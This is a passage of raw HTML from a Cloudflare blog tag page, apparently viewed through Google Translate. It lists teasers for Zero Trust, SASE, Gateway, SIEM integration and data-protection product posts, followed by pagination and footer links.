class="fw5 f2 black no-underline">Daniele Molteni</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/ankur/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Ankur Aggarwal</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/security-week/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security Week</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/application-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Application Security</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/email-security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Email Security</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/ai/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">AI</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-03-08T14:00:58.000+00:00">March 08, 2024 2:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/gatway-protocol-detection/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Protocol detection with Cloudflare Gateway</h6></a> <p class="gray1 lh-copy">Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols using packet payloads without the need for inspection<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/ankur/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Ankur Aggarwal</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/security-week/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security Week</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/gateway/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare Gateway</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-03-06T14:01:00.000+00:00">March 06, 2024 2:01 PM</p><a href="https://blog-cloudflare-com.translate.goog/introducing-magic-cloud-networking/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Magic Cloud Networking simplifies security, connectivity, and management of public clouds</h6></a> <p class="gray1 lh-copy">Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers secure, easy, and seamless connection to public cloud environments<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/steve-welham/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Steve Welham</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/david-naylor/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">David Naylor</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/security-week/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security Week</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/network/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Network</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/aws/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">AWS</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/ec2/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">EC2</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/google-cloud/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Google Cloud</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-03-05T14:00:51.000+00:00">March 05, 2024 2:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/securing-cloudflare-with-cloudflare-zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Securing Cloudflare with Cloudflare: a Zero Trust journey</h6></a> <p class="gray1 lh-copy">A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/derek-pitts/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Derek Pitts</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/ankur/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Ankur Aggarwal</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/emily-hancock/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Emily Hancock</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/security-week/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security Week</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/api-gateway/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">API Gateway</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/privacy/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Privacy</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-02-22T14:00:26.000+00:00">February 22, 2024 2:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/enhancing-security-analysis-with-cloudflare-zero-trust-logs-and-elastic-siem/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Enhancing security analysis with Cloudflare Zero Trust logs and Elastic SIEM</h6></a> <p class="gray1 lh-copy">Today, we are thrilled to announce new Cloudflare Zero Trust dashboards on Elastic. Shared customers using Elastic can now use these pre-built dashboards to store, search, and analyze their Zero Trust logs<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/corey-mahan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Corey Mahan</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/gavin/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Gavin Chen</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/andrew-meyer/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Andrew Meyer</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/chema/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Chema Martínez (Guest Author)</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Product News</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/logs/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Logs</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/siem/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SIEM</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2024-02-07T14:00:55.000+00:00">February 07, 2024 2:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/single-vendor-sase-announcement-2024/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Fulfilling the promise of single-vendor SASE through network modernization</h6></a> <p class="gray1 lh-copy">Today, we are announcing a series of updates to our SASE platform, Cloudflare One, that further the promise of a single-vendor SASE architecture<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/michael-keane/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Michael Keane</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SASE</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/devops/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">DevOps</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare One</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/magic-wan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Magic WAN</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2023-10-03T13:55:34.000+01:00">October 03, 2023 12:55 PM</p><a href="https://blog-cloudflare-com.translate.goog/magic-wan-connector-general-availability/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Announcing General Availability for the Magic WAN Connector: the easiest way to jumpstart SASE transformation for your network</h6></a> <p class="gray1 lh-copy">We’re announcing the general availability of the Magic WAN Connector, which serves as the glue between your existing network hardware and Cloudflare’s networ<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/annika/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Annika Garbers</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Product News</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/security/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Security</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/magic-wan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Magic WAN</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/magic-wan-connector/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Magic WAN Connector</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/sase/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">SASE</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2023-09-07T14:00:35.000+01:00">September 07, 2023 1:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/cloudflare-one-data-protection-announcement/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Cloudflare One for Data Protection</h6></a> <p class="gray1 lh-copy">This blog announces Cloudflare One for Data Protection — our unified suite to protect data everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/james-chang/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">James Chang</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare One</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/dlp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">DLP</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/casb/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">CASB</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/ai/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">AI</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2023-09-07T14:00:31.000+01:00">September 07, 2023 1:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/cloudflare-one-data-protection-roadmap-preview/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">What’s next for Cloudflare One’s data protection suite</h6></a> <p class="gray1 lh-copy">Cloudflare One just launched its data protection suite. This blog previews new functionality to protect data and code in SaaS environments with our DLP and CASB services and looks back on what we have built over the past year<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/corey-mahan/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Corey Mahan</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/james-chang/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">James Chang</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/alex-dunbrack/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Alex Dunbrack</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/noelle/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Noelle Kagan</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/cloudflare-one/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Cloudflare One</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/dlp/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">DLP</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/product-news/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Product News</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/casb/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">CASB</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> </div> </article> <article data-testid="more-posts-article" class="w-100 w-100-m ph3 mb4"> <p class="f3 fw5 gray1" data-iso-date="2023-08-03T14:00:33.000+01:00">August 03, 2023 1:00 PM</p><a href="https://blog-cloudflare-com.translate.goog/integrate-cloudflare-zero-trust-with-datadog-cloud-siem/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 fw5"><h6 class="gray1 f4 fw5 mt2">Integrate Cloudflare Zero Trust with Datadog Cloud SIEM</h6></a> <p class="gray1 lh-copy">Today, we are very excited to announce the general availability of Cloudflare Zero Trust Integration with Datadog<!-- -->...</p> <ul class="flex pl0 fw6 f2"> <span>By<!-- --> </span> <li class="list flex items-center"> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/mythili/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Mythili Prabhu</a> </div></li> <li class="list flex items-center"> <div class="author-name-tooltip"> <span class="fw5 f2 black no-underline">, </span><a href="https://blog-cloudflare-com.translate.goog/author/nimisha/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f2 black no-underline">Nimisha Saxena (Guest Author)</a> </div></li> </ul> <div class="flex flex-row flex-wrap"> <div> <a href="https://blog-cloudflare-com.translate.goog/tag/logs/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Logs</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Zero Trust</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/dashboard-tag/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Dashboard</a> </div> <div> <span class="f1 fw2 blue3 no-underline underline-hover">, </span><a href="https://blog-cloudflare-com.translate.goog/tag/connectivity-cloud/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline f1 fw2 blue3 underline-hover">Connectivity Cloud</a> </div> </div> </article><!--astro:end--> </astro-island> <div class="pagination mw-100 center mv5 ph3 w-100 tc"> <div class="center w-50-l w-100"> <div class="flex items-center justify-center justify-around-m "> <ul class="flex list ml3" style="padding-inline-start:inherit"> <li class="gray"><a class="no-underline underline-hover dib-m dib-l mr1 gray3 " href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB">1</a></li> <li class=""><a class="no-underline underline-hover dib-m dib-l mr1 blue3" href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/page/2/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB">2</a></li> <li class="ml">…</li> <li><a class="no-underline underline-hover dib-m dib-l mr3 blue3" href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/page/9/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB">9</a></li> </ul><span><a class="no-underline blue3 underline-hover" data-testid="pagination-toggle-next" href="https://blog-cloudflare-com.translate.goog/tag/zero-trust/page/2/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" rel="prev"><span class="underline-hover dn dib-m dib-l">Older Posts</span> →</a></span> </div> </div> </div> </main> <footer class="pt4 pb4 pl1 pr1 main-footer"> <div class="mw8 center dn db-l ph3"> <div class="flex flex-row justify-between"> <div class="main-footer__menu-group"> <ul id="getting-started-menu" class="list pl0"> <li class="pt1 pb1 f1 main-footer__menu-group__header js-toggle-footer-group" data-submenu="getting-started-menu">Getting Started<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/plans/free/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="free-plans" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Free plans</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/enterprise/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="enterprise" class="f1 blue3 no-underline underline-hover" rel="noreferrer">For enterprises</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/plans/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="compare-plans" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Compare plans</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/about-your-website/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="get-a-recommendation" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Get a recommendation</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/plans/enterprise/demo/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="request-a-demo" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Request a demo</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/plans/enterprise/contact/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="contact-sales" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Contact Sales</a></li> </ul> </div> <div class="main-footer__menu-group"> <ul id="company-menu" class="list pl0"> <li class="pt1 pb1 f1" data-submenu="company-menu">Resources<i class="icon-caret-down"></i></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/learning/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="learning-center" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Learning Center</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/analysts/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="analysts-report" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Analyst reports</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://radar.cloudflare.com/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="overview" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Cloudflare Radar</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://cloudflare.tv/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="tv" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Cloudflare TV</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/case-studies/" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="case-studies" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Case Studies</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/resource-hub/?resourcetype%3DWebinar" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="webinars" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Webinars</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://www.cloudflare.com/resource-hub/?resourcetype%3DWhitepaper" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="white-papers" class="f1 blue3 no-underline underline-hover" rel="noreferrer">White Papers</a></li> <li class="pt1 pb1"><a href="https://translate.google.com/website?sl=pl&tl=de&hl=en-GB&u=https://developers.cloudflare.com" target="_blank" data-tracking-category="footer" data-tracking-action="click" data-tracking-label="developer-docs" class="f1 blue3 no-underline underline-hover" rel="noreferrer">Developer docs</a></li> <li class="pt1 